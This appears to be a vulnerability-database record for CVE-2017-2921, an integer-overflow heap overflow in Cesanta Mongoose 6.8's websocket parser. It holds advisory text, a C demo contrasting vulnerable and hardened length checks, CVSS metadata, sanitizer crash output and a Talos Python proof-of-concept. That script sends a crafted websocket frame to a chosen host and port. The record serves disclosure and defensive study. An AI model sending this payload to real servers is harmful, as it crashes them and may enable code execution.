An exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer overflow, leading to a heap buffer overflow and resulting in denial of service and potential remote code execution. An attacker needs to send a specially crafted websocket packet over the network to trigger this vulnerability. The issue was reported by Cisco Talos as TALOS-2017-0428 (CWE-190: Integer Overflow or Wraparound) and, per the Talos disclosure, is fixed together with the other Mongoose 6.8 findings in Mongoose 6.10.
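The Talos report explains the bug as a wraparound in `frame_len = header_len + data_len`: a 64-bit payload length near 2^64 plus a 14-byte header (10 bytes plus a 4-byte mask) wraps to a tiny `frame_len` that passes `frame_len <= buf_len`, while the unmasking loop is still bounded by the huge `data_len`. The block below is an added illustration, not code from Mongoose or from the Talos advisory: it re-implements the frame-header parse and the length check in the vulnerable shape, beside a hardened check that compares `data_len` against the space actually left after the header (subtraction instead of addition, plus the RFC 6455 rule that the top bit of a 64-bit length must be zero). The function names (`ws_parse_header`, `ws_frame_ok_vulnerable`, `ws_frame_ok_hardened`, `ws_build_frame64`) and the sample frame are constructed here; the declared length `0xffffffffffffffff - 12` with 40 padding bytes is the one the public PoC sends. The hardened variant is one way to fix the pattern, not necessarily the change Cesanta shipped in 6.10. The example deliberately stops at the accept/reject decision and never runs the XOR loop, so it does not corrupt memory.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Parsed websocket frame header: header bytes (incl. mask key) and the
 * payload length exactly as declared on the wire. Illustrative struct. */
struct ws_hdr {
    uint64_t header_len;
    uint64_t data_len;
};

/* Parse the 2-byte base header, the MASK bit and the 7/16/64-bit length.
 * Returns 0 on success, -1 if buf is too short to hold the full header.
 * On success buf_len >= header_len is guaranteed in every branch. */
static int ws_parse_header(const unsigned char *buf, uint64_t buf_len, struct ws_hdr *h)
{
    if (buf_len < 2) return -1;
    uint64_t mask_len = (buf[1] & 0x80) ? 4 : 0;
    unsigned len7 = buf[1] & 0x7f;
    if (len7 < 126) {
        if (buf_len < 2 + mask_len) return -1;
        h->header_len = 2 + mask_len;
        h->data_len = len7;
    } else if (len7 == 126) {
        if (buf_len < 4 + mask_len) return -1;
        h->header_len = 4 + mask_len;
        h->data_len = ((uint64_t)buf[2] << 8) | buf[3];
    } else {
        if (buf_len < 10 + mask_len) return -1;
        h->header_len = 10 + mask_len;
        uint64_t v = 0;                       /* 64-bit big-endian length at buf[2..9] */
        for (int i = 0; i < 8; i++) v = (v << 8) | buf[2 + i];
        h->data_len = v;
    }
    return 0;
}

/* Vulnerable shape from the advisory: header_len + data_len can wrap past
 * 2^64 to a small frame_len that satisfies frame_len <= buf_len although
 * data_len is far larger than the receive buffer. */
static int ws_frame_ok_vulnerable(const unsigned char *buf, uint64_t buf_len)
{
    struct ws_hdr h;
    if (ws_parse_header(buf, buf_len, &h) != 0) return 0;
    uint64_t frame_len = h.header_len + h.data_len;   /* may wrap */
    return frame_len > 0 && frame_len <= buf_len;
}

/* Hardened check: bound data_len by the bytes remaining after the header.
 * The subtraction cannot wrap because the parser enforced buf_len >= header_len.
 * A 64-bit length with its most significant bit set is invalid per RFC 6455. */
static int ws_frame_ok_hardened(const unsigned char *buf, uint64_t buf_len)
{
    struct ws_hdr h;
    if (ws_parse_header(buf, buf_len, &h) != 0) return 0;
    if (h.data_len >> 63) return 0;
    return h.data_len <= buf_len - h.header_len;
}

/* Constructed input: masked frame with a 64-bit extended length field.
 * declared_len is written to the wire; only `pad` payload bytes are present.
 * Returns the number of bytes written (14 + pad). */
static size_t ws_build_frame64(unsigned char *out, uint64_t declared_len, size_t pad)
{
    out[0] = 0x81;                 /* FIN + text opcode (irrelevant to the bug) */
    out[1] = 0x80 | 127;           /* MASK set, 64-bit length follows */
    for (int i = 0; i < 8; i++)
        out[2 + i] = (unsigned char)(declared_len >> (8 * (7 - i)));
    memset(out + 10, 0, 4);        /* masking key: all zero, as in the PoC */
    memset(out + 14, 'A', pad);    /* the payload bytes that actually arrive */
    return 14 + pad;
}

/* PoC length: 0xffffffffffffffff - 12 declared, 40 bytes present.
 * header_len = 14, so 0xfffffffffffffff3 + 14 wraps to frame_len = 1.
 * Returns 1 when the vulnerable check accepts and the hardened check rejects. */
int demo_wraparound(void)
{
    unsigned char frame[64];
    size_t n = ws_build_frame64(frame, 0xffffffffffffffffULL - 12, 40);
    return ws_frame_ok_vulnerable(frame, n) == 1 && ws_frame_ok_hardened(frame, n) == 0;
}

/* Well-formed frame: 40 bytes declared and 40 present; both checks accept. */
int demo_legit(void)
{
    unsigned char frame[64];
    size_t n = ws_build_frame64(frame, 40, 40);
    return ws_frame_ok_vulnerable(frame, n) == 1 && ws_frame_ok_hardened(frame, n) == 1;
}

int main(void)
{
    printf("crafted frame:    %s\n", demo_wraparound()
           ? "vulnerable check accepts, hardened check rejects" : "unexpected result");
    printf("legitimate frame: %s\n", demo_legit() ? "both checks accept" : "unexpected result");
    return 0;
}
```

The general rule the hardened variant applies is to never validate `a + b <= limit` with unsigned arithmetic when `b` is attacker-controlled; validate `b <= limit - a` after establishing `a <= limit`, so no intermediate can wrap. Note that the legitimate frame here uses the 64-bit length encoding for a 40-byte payload, which RFC 6455 forbids (minimal encoding is required); a strict parser would reject it, but that rule is orthogonal to the overflow being shown.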
{"id": "CVE-2017-2921", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2017-2921", "description": "An exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer overflow, leading to a heap buffer overflow and resulting in denial of service and potential remote code execution. An attacker needs to send a specially crafted websocket packet over network to trigger this vulnerability.", "published": "2017-11-07T16:29:00", "modified": "2022-06-13T19:16:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2921", "reporter": "talos-cna@cisco.com", "references": ["https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0428"], "cvelist": ["CVE-2017-2921"], "immutableFields": [], "lastseen": "2022-06-13T20:35:31", "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-2921"]}, {"type": "redhatcve", 
"idList": ["RH:CVE-2017-2893", "RH:CVE-2017-2921"]}, {"type": "seebug", "idList": ["SSV:96808"]}, {"type": "talos", "idList": ["TALOS-2017-0428"]}, {"type": "talosblog", "idList": ["TALOSBLOG:BF9B74979C194FA29647576078478DE0"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-2921"]}]}, "score": {"value": 4.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-2921"]}, {"type": "seebug", "idList": ["SSV:96808"]}, {"type": "talos", "idList": ["TALOS-2017-0428"]}, {"type": "talosblog", "idList": ["TALOSBLOG:BF9B74979C194FA29647576078478DE0"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-2921"]}]}, "exploitation": null, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/threatintelctr/status/1536434044543479808", "text": " NEW: CVE-2017-2921 An exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer overflow, le... 
(click for more) Severity: CRITICAL https://t.co/3s3k8jaes3", "author": "threatintelctr", "author_photo": "https://pbs.twimg.com/profile_images/904224973987840000/dMy1x9Ho_400x400.jpg"}, {"link": "https://twitter.com/WolfgangSesin/status/1536556828234072065", "text": "New post from https://t.co/uXvPWJy6tj (CVE-2017-2921 (mongoose)) has been published on https://t.co/VvUodXl8L9", "author": "WolfgangSesin", "author_photo": "https://pbs.twimg.com/profile_images/957011635369054208/Om3jbj7z_400x400.jpg"}, {"link": "https://twitter.com/www_sesin_at/status/1536556829802737664", "text": "New post from https://t.co/9KYxtdZjkl (CVE-2017-2921 (mongoose)) has been published on https://t.co/YACjoOdfY4", "author": "www_sesin_at", "author_photo": "https://pbs.twimg.com/profile_images/958100963822329858/fb_N8h5n_400x400.jpg"}]}, "vulnersScore": 4.2}, "_state": {"dependencies": 1660004461, "twitter": 1655180698, "score": 1659843777}, "_internal": {"score_hash": "105765eae402310ba6ea66a4664a1b0f"}, "cna_cvss": {"cna": "Talos", "cvss": {"3": {"vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "score": 8.1}}}, "cpe": ["cpe:/a:cesanta:mongoose:6.8"], "cpe23": ["cpe:2.3:a:cesanta:mongoose:6.8:*:*:*:*:*:*:*"], "cwe": ["CWE-190"], "affectedSoftware": [{"cpeName": "cesanta:mongoose", "version": "6.8", "operator": "eq", "name": "cesanta mongoose"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:cesanta:mongoose:6.8:*:*:*:*:*:*:*", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0428", "name": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0428", "refsource": "MISC", "tags": ["Exploit", "Technical Description", "Third Party Advisory"]}]}
{"talos": [{"lastseen": "2022-06-13T22:03:01", "description": "### Summary\n\nAn exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer overflow resulting leading to heap buffer overflow resulting in denial of service and potential remote code execution. An attacker needs to send a specially crafted websocket packet over network to trigger this vulnerability.\n\n### Tested Versions\n\nCesanta Mongoose 6.8\n\n### Product URLs\n\n<https://cesanta.com/>\n\n### CVSSv3 Score\n\n8.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-190: Integer Overflow or Wraparound\n\n### Details\n\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. Its HTTP implementation includes upgrade support required for websocket applications. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\n\nAfter the initial websocket handshake and while parsing a websocket packet, an integer overflow involving header length and packet size can occur. Insufficient checks after the potential overflow can later lead to very large memory overwrite which can result in heap memory corruption, process crash and potentially in remote code execution.\n \n \n Function `mg_deliver_websocket_data` is responsible for parsing the websocket packet. 
Relevant code is:\n \n \n \n uint64_t i, data_len = 0, frame_len = 0, buf_len = nc->recv_mbuf.len, len, [1]\n mask_len = 0, header_len = 0;\n ...\n if (buf_len >= 2) \n ...\n else if (buf_len >= 10 + mask_len) \n header_len = 10 + mask_len; [2]\n data_len = (((uint64_t) ntohl(*(uint32_t *) &buf[2])) << 32) + [3]\n ntohl(*(uint32_t *) &buf[6]);\n \n \n \n frame_len = header_len + data_len; [4]\n ok = frame_len > 0 && frame_len <= buf_len; [5]\n \n if (ok) \n ...\n /* Apply mask if necessary */\n if (mask_len > 0) { \n for (i = 0; i < data_len; i++) \n buf[i + header_len] ^= (buf + header_len - mask_len)[i % 4]; [6]\n \n\nIn the above code, we can see at [1] local variables `frame_len`, `header_len` and `data_len` being declared as 64bit unsigned integers. At [2] header length is calculated since websocket protocol specifies variable length headers. At [3], 8 bytes from the packet are used as `data_len` directly. At [4], total `frame_len` is calculated and at [5] basic sanity checks are performed. If everything is ok, and the packet has mask bit set, at [6] all the data in the buffer is XORed with 4 byte mask.\n\nAn insufficient check above at [5] can allow for an integer overflow to pass undetected. In case `data_len`is a very large value, adding `header_len` to it can lead to integer wraparound , resulting in small `frame_len` value. Small `frame_len` value passes `frame_len <= buf_len` check, while `data_len` is still huge and bigger than the actual buffer size. 
This results in a large heap overflow at [6] as the for loop is bounded by `data_len` only.\n\nThis causes the process to crash, leading to denial of service and in some cases potentially to remote code execution.\n\n### Crash Information\n \n \n Address sanitizer output:\n \n ==88164==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000006380 at pc 0x00000051abae bp 0x7fffffffb490 sp \n 0x7fffffffb488\n READ of size 1 at 0x619000006380 thread T0\n #0 0x51abad in mg_deliver_websocket_data /home/user/mongoose/examples/websocket_chat/../../mongoose.c:8866\n #1 0x51abad in ?? ??:0\n #2 0x5128d4 in mg_ws_handler /home/user/mongoose/examples/websocket_chat/../../mongoose.c:9045 (discriminator 1)\n #3 0x5128d4 in ?? ??:0\n #4 0x4f9de6 in mg_call /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2051\n #5 0x4f9de6 in ?? ??:0\n #6 0x4fdcf9 in mg_recv_common /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2502\n #7 0x4fdcf9 in ?? ??:0\n #8 0x506603 in mg_if_recv_tcp_cb /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2506\n #9 0x506603 in mg_handle_tcp_read /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3372\n #10 0x506603 in mg_mgr_handle_conn /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3497\n #11 0x506603 in ?? ??:0\n #12 0x509dd8 in mg_socket_if_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3690\n #13 0x509dd8 in ?? ??:0\n #14 0x4fb695 in mg_mgr_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2232\n #15 0x4fb695 in ?? ??:0\n #16 0x4ea65a in main /home/user/mongoose/examples/websocket_chat/websocket_chat.c:78\n #17 0x4ea65a in ?? ??:0\n #18 0x7ffff6ee582f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291\n #19 0x7ffff6ee582f in ?? ??:0\n #20 0x418e58 in _start ??:?\n #21 0x418e58 in ?? 
??:0\n \n \n 0x619000006380 is located 0 bytes to the right of 1024-byte region [0x619000005f80,0x619000006380)\n allocated by thread T0 here:\n #0 0x4b8f88 in __interceptor_malloc ??:?\n #1 0x4b8f88 in ?? ??:0\n #2 0x506453 in mg_handle_tcp_read /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3336 (discriminator 1)\n #3 0x506453 in mg_mgr_handle_conn /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3497 (discriminator 1)\n #4 0x506453 in ?? ??:0\n #5 0x509dd8 in mg_socket_if_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3690\n #6 0x509dd8 in ?? ??:0\n #7 0x4fb695 in mg_mgr_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2232\n #8 0x4fb695 in ?? ??:0\n #4 0x60200000efef (<unknown module>)\n \n SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/user/mongoose/examples/websocket_chat/websocket_chat+0x51abad)\n Shadow bytes around the buggy address:\n 0x0c327fff8c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c327fff8c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c327fff8c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c327fff8c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x0c327fff8c60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n =>0x0c327fff8c70:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fff8c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fff8c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fff8ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fff8cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fff8cc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n Shadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07\n Heap left redzone: fa\n Heap right redzone: fb\n Freed heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack partial redzone: f4\n Stack after return: f5\n Stack 
use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n Container overflow: fc\n Array cookie: ac\n Intra object redzone: bb\n ASan internal: fe\n Left alloca redzone: ca\n Right alloca redzone: cb\n ==88164==ABORTING\n \n\n### Exploit Proof-of-Concept\n \n \n import socket\n import struct\n import sys\n http_upgrade = ('GET /chat HTTP/1.1\\r\\n'\n 'Host: server.example.com\\r\\n'\n 'Upgrade: websocket\\r\\n'\n 'Connection: Upgrade\\r\\n'\n 'Sec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==\\r\\n'\n 'Sec-WebSocket-Protocol: chat, superchat\\r\\n'\n 'Sec-WebSocket-Version: 13\\r\\n'\n 'Origin: http://example.com\\r\\n\\r\\n')\n #only HTTP \"Upgrade: websocket\" header matters above, the above GET request was copied verbatim from wikipedia\n \n \n payload = \"\\x00\" # FIN flag doesn't matter, opcode doesn't matter\n payload += chr(0x80 | 127 ) # mask is set, payload len of 127 means next 64 bits are actual payload len\n payload_len = 0xffffffffffffffff -12 #actual payload len\n payload += struct.pack(\"!Q\",payload_len)\n masking_key = 0 #masking key can be anything, and would need to be a specific value in real exploit\n payload += struct.pack(\"I\",masking_key)\n payload += \"A\"*40 #garbage to pad the packet\n \n \n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((sys.argv[1],int(sys.argv[2])))\n s.send(http_upgrade)\n print s.recv(1024)\n s.send(payload)\n print s.recv(1024)\n \n\n### Timeline\n\n2017-08-30 - Vendor Disclosure \n2017-10-31 - Public Release\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-10-31T00:00:00", "type": 
"talos", "title": "Cesanta Mongoose Websocket Protocol Packet Length Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2921"], "modified": "2017-10-31T00:00:00", "id": "TALOS-2017-0428", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0428", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2022-08-04T13:55:15", "description": "An exploitable memory corruption vulnerability exists in the Websocket\nprotocol implementation of Cesanta Mongoose 6.8. A specially crafted\nwebsocket packet can cause an integer overflow, leading to a heap buffer\noverflow and resulting in denial of service and potential remote code\nexecution. 
An attacker needs to send a specially crafted websocket packet\nover network to trigger this vulnerability.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | mongoose is used on windows only to serve up content for chromecast\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2921", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2921"], "modified": "2017-11-07T00:00:00", "id": "UB:CVE-2017-2921", "href": "https://ubuntu.com/security/CVE-2017-2921", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2022-07-04T06:02:23", "description": "An exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer overflow, leading to a heap buffer overflow and resulting in denial of service and potential remote code execution. 
An attacker needs to send a specially crafted websocket packet over network to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-07T16:29:00", "type": "debiancve", "title": "CVE-2017-2921", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2921"], "modified": "2017-11-07T16:29:00", "id": "DEBIANCVE:CVE-2017-2921", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2921", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T11:55:42", "description": "### Summary\r\nAn exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer overflow resulting leading to heap buffer overflow resulting in denial of service and potential remote code execution. 
An attacker needs to send a specially crafted websocket packet over network to trigger this vulnerability.\r\n\r\n### Tested Versions\r\nCesanta Mongoose 6.8\r\n\r\n### Product URLs\r\nhttps://cesanta.com/\r\n\r\n### CVSSv3 Score\r\n8.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\r\n\r\n### CWE\r\nCWE-190: Integer Overflow or Wraparound\r\n\r\n### Details\r\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. Its HTTP implementation includes upgrade support required for websocket applications. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\r\n\r\nAfter the initial websocket handshake and while parsing a websocket packet, an integer overflow involving header length and packet size can occur. Insufficient checks after the potential overflow can later lead to very large memory overwrite which can result in heap memory corruption, process crash and potentially in remote code execution.\r\n\r\nFunction `mg_deliver_websocket_data` is responsible for parsing the websocket packet. Relevant code is:\r\n```\r\nuint64_t i, data_len = 0, frame_len = 0, buf_len = nc->recv_mbuf.len, len, [1]\r\n mask_len = 0, header_len = 0;\r\n ...\r\n if (buf_len >= 2) \r\n ...\r\n else if (buf_len >= 10 + mask_len) \r\n header_len = 10 + mask_len; [2]\r\n data_len = (((uint64_t) ntohl(*(uint32_t *) &buf[2])) << 32) + [3]\r\n ntohl(*(uint32_t *) &buf[6]);\r\n\r\n\r\n\r\nframe_len = header_len + data_len; [4]\r\n ok = frame_len > 0 && frame_len <= buf_len; [5]\r\n\r\n if (ok) \r\n ...\r\n /* Apply mask if necessary */\r\n if (mask_len > 0) { \r\n for (i = 0; i < data_len; i++) \r\n buf[i + header_len] ^= (buf + header_len - mask_len)[i % 4]; [6]\r\n```\r\n\r\nIn the above code, we can see at [1] local variables `frame_len`, `header_len` and `data_len` being declared as 64bit unsigned integers. 
At [2] header length is calculated since websocket protocol specifies variable length headers. At [3], 8 bytes from the packet are used as `data_len` directly. At [4], total `frame_len` is calculated and at [5] basic sanity checks are performed. If everything is ok, and the packet has mask bit set, at [6] all the data in the buffer is XORed with 4 byte mask.\r\n\r\nAn insufficient check above at [5] can allow for an integer overflow to pass undetected. In case `data_len` is a very large value, adding header_len to it can lead to integer wraparound , resulting in small `frame_len` value. Small `frame_len` value passes `frame_len` <= buf_len check, while data_len is still huge and bigger than the actual buffer size. This results in a large heap overflow at [6] as the for loop is bounded by `data_len` only.\r\n\r\nThis causes the process to crash, leading to denial of service and in some cases potentially to remote code execution.\r\n\r\n### Crash Information\r\n```\r\nAddress sanitizer output:\r\n\r\n==88164==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000006380 at pc 0x00000051abae bp 0x7fffffffb490 sp \r\n0x7fffffffb488\r\nREAD of size 1 at 0x619000006380 thread T0\r\n #0 0x51abad in mg_deliver_websocket_data /home/user/mongoose/examples/websocket_chat/../../mongoose.c:8866\r\n #1 0x51abad in ?? ??:0\r\n #2 0x5128d4 in mg_ws_handler /home/user/mongoose/examples/websocket_chat/../../mongoose.c:9045 (discriminator 1)\r\n #3 0x5128d4 in ?? ??:0\r\n #4 0x4f9de6 in mg_call /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2051\r\n #5 0x4f9de6 in ?? ??:0\r\n #6 0x4fdcf9 in mg_recv_common /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2502\r\n #7 0x4fdcf9 in ?? 
??:0\r\n #8 0x506603 in mg_if_recv_tcp_cb /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2506\r\n #9 0x506603 in mg_handle_tcp_read /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3372\r\n #10 0x506603 in mg_mgr_handle_conn /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3497\r\n #11 0x506603 in ?? ??:0\r\n #12 0x509dd8 in mg_socket_if_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3690\r\n #13 0x509dd8 in ?? ??:0\r\n #14 0x4fb695 in mg_mgr_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2232\r\n #15 0x4fb695 in ?? ??:0\r\n #16 0x4ea65a in main /home/user/mongoose/examples/websocket_chat/websocket_chat.c:78\r\n #17 0x4ea65a in ?? ??:0\r\n #18 0x7ffff6ee582f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291\r\n #19 0x7ffff6ee582f in ?? ??:0\r\n #20 0x418e58 in _start ??:?\r\n #21 0x418e58 in ?? ??:0\r\n\r\n\r\n0x619000006380 is located 0 bytes to the right of 1024-byte region [0x619000005f80,0x619000006380)\r\nallocated by thread T0 here:\r\n #0 0x4b8f88 in __interceptor_malloc ??:?\r\n #1 0x4b8f88 in ?? ??:0\r\n #2 0x506453 in mg_handle_tcp_read /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3336 (discriminator 1)\r\n #3 0x506453 in mg_mgr_handle_conn /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3497 (discriminator 1)\r\n #4 0x506453 in ?? ??:0\r\n #5 0x509dd8 in mg_socket_if_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3690\r\n #6 0x509dd8 in ?? ??:0\r\n #7 0x4fb695 in mg_mgr_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2232\r\n #8 0x4fb695 in ?? 
